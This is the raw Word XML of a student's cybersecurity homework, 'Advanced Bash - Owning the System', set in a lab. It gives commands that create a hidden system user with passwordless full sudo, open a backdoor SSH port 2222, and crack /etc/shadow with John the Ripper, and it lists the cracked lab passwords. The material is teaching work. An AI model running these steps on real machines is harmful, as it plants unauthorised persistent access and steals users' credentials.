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A787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## Week 6 Homework Submission File: Advanced Bash - Owning the System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DDC0F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507E36F3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150ED60E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**Step 1: Shadow People** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75369F64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4B8DA408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1. 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Create a secret user named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`sysd`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. Make sure this user doesn't have a home folder created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DAA58B" w14:textId="204EAB9D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AU"/>
        </w:rPr>
        <w:t>    -</w:t>
      </w:r>
      <w:r w:rsidR="00DC3E38" w:rsidRPr="00A37240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AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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u</w:t>
      </w:r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seradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="460D88C8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10453ED8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2. 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Give your secret user a password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88A44F" w14:textId="0E6C184D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AU"/>
        </w:rPr>
        <w:t>    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:r w:rsidR="00F77595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password</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54143B3F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2731C3D8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3. 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Give your secret user a system UID &lt; 1000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B32F4C9" w14:textId="5546CBFF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AU"/>
        </w:rPr>
        <w:t>    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-u 200 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CE58927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7CCB779A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4. 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Give your secret user the same GID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8585E" w14:textId="3304A790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AU"/>
        </w:rPr>
        <w:t>   - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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groupmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-g 200 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC3E38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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F22C6B8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042E6002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5. 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Give your secret user full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`sudo`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 access without the need for a password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C98F8" w14:textId="56966349" w:rsidR="00F77595" w:rsidRPr="00A37240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   -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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F77595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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F77595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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F77595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visudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="626BCE9E" w14:textId="4C709313" w:rsidR="00F77595" w:rsidRPr="00A37240" w:rsidRDefault="00F77595" w:rsidP="00F7759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proofErr w:type="spellStart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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ALL=(ALL) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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NOPASSWD:ALL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00455184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7E54F76A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6. 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Test that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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 access works without your password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA492C4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3A7AB300" w14:textId="27D48BB6" w:rsidR="00862E4E" w:rsidRDefault="00F77595" w:rsidP="00F7759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proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-n -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="200093DE" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00A37240" w:rsidRDefault="00166EBD" w:rsidP="00166EB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</w:p>
    <w:p w14:paraId="1031D90D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**Step 2: Smooth Sailing**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360773A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06CACC0F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1. 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Edit the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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0302B7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6AA59D2D" w14:textId="63EB605B" w:rsidR="00862E4E" w:rsidRDefault="00A37240" w:rsidP="00A372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proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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nano </w:t>
      </w:r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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57DC6178" w14:textId="62834F73" w:rsidR="00A37240" w:rsidRDefault="00A37240" w:rsidP="00A372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Port 2222</w:t>
      </w:r>
      <w:r w:rsidR="00166EBD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(Add Port 2222 and remove the hashtag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF09C5" w14:textId="440FCDA0" w:rsidR="00FB4E79" w:rsidRPr="00A37240" w:rsidRDefault="00FB4E79" w:rsidP="00A372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sudo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ufr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allow 2222/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E8BB81D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0123188A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**Step 3: Testing Your Configuration Update**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A711E1B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1. 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Restart the SSH service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CBF96" w14:textId="7A5D7F19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    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A37240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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A37240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service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A37240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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A37240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restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EB143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</w:p>
    <w:p w14:paraId="09933408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2. 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Exit the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`root`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 account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FBE77" w14:textId="20C1C07A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    - </w:t>
      </w:r>
      <w:r w:rsidR="00A37240" w:rsidRPr="00A37240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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7AD7D5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32B70948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3. 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SSH to the target machine using your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`sysd`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 account and port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`2222`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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBCF39" w14:textId="2AF723E4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AU"/>
        </w:rPr>
        <w:t>    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:eastAsia="en-AU"/>
          </w:rPr>
          <w:t>sysd@192.168.6.105</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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-p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B797CCD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1EB575B4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4. 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Use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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 to switch to the root user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32713AD5" w14:textId="33AC6E3C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    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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</w:t>
      </w:r>
      <w:r w:rsidR="00FB4E79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-s</w:t>
      </w:r>
      <w:r w:rsidR="00166EBD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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00166EBD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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00166EBD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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00166EBD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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CEAB8F3" w14:textId="6026719B" w:rsid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0CC2046C" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRDefault="00166EBD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13C60544" w14:textId="513581D1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lastRenderedPageBreak/>
        <w:t>**Step 4: Crack All the Passwords**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4C404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4DA09DC7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1. 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SSH back to the system using your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`sysd`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 account and port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`2222`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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1AA58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7780BDA5" w14:textId="1303E232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    - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:eastAsia="en-AU"/>
          </w:rPr>
          <w:t>sysd@192.168.6.105</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB4E79" w:rsidRPr="00FB4E79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 xml:space="preserve"> -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F84E51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3405FEEC" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRDefault="00862E4E" w:rsidP="0016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862E4E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>2. 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Escalate your privileges to the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`root`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 user. Use John to crack the entire </w:t>
      </w:r>
      <w:r w:rsidRPr="00862E4E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>`/etc/shadow`</w:t>
      </w:r>
      <w:r w:rsidRPr="00862E4E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 file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E6B6C" w14:textId="1FBECB9B" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="00166EB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r w:rsidRPr="00166EBD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john /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FD9F6" w14:textId="66460902" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="00166EB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</w:pPr>
      <w:r w:rsidRPr="00166EBD"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t>john –show /etc/shadow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AU"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1F779" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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computer      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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stallman</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FC99A" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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freedom       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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babbage</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62060152" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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password      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D819B" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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trustno1      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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mitnik</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311D07A" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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dragon        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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lovelace</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77C8DC" w14:textId="77777777" w:rsidR="00166EBD" w:rsidRPr="00166EBD" w:rsidRDefault="00166EBD" w:rsidP="0016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lakers        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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turing</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC39287" w14:textId="27619962" w:rsidR="00862E4E" w:rsidRPr="00862E4E" w:rsidRDefault="00166EBD" w:rsidP="00166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passw0rd      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00166EBD"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  <w:t>sysadmin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B95ED3" w14:textId="77777777" w:rsidR="00862E4E" w:rsidRPr="00862E4E" w:rsidRDefault="00862E4E" w:rsidP="00862E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06F377D3" w14:textId="77777777" w:rsidR="00862E4E" w:rsidRPr="00862E4E" w:rsidRDefault="00862E4E" w:rsidP="00862E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AU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BEB041" w14:textId="77777777" w:rsidR="000834C3" w:rsidRDefault="000834C3"/>
    <w:sectPr w:rsidR="0008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0455"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1F8A784"/>
    <w:lvl w:ilvl="0" w:tplc="5DC23DD2">
      <w:start w:val="5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D745B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F51023D8"/>
    <w:lvl w:ilvl="0" w:tplc="5DC23DD2">
      <w:start w:val="5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323107">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="112153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9B"/>
    <w:rsid w:val="000834C3"/>
    <w:rsid w:val="00166EBD"/>
    <w:rsid w:val="0049565A"/>
    <w:rsid w:val="00862E4E"/>
    <w:rsid w:val="00A05860"/>
    <w:rsid w:val="00A37240"/>
    <w:rsid w:val="00AC309B"/>
    <w:rsid w:val="00C31722"/>
    <w:rsid w:val="00DC3E38"/>
    <w:rsid w:val="00F77595"/>
    <w:rsid w:val="00F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B217"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E615DE20-A3FB-403D-A245-D7B85547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9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line">
    <w:name w:val="line"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AC309B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F77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sd@192.168.6.105" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:sysd@192.168.6.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Mohl</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nicholas Mohl</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-19T23:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-20T00:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>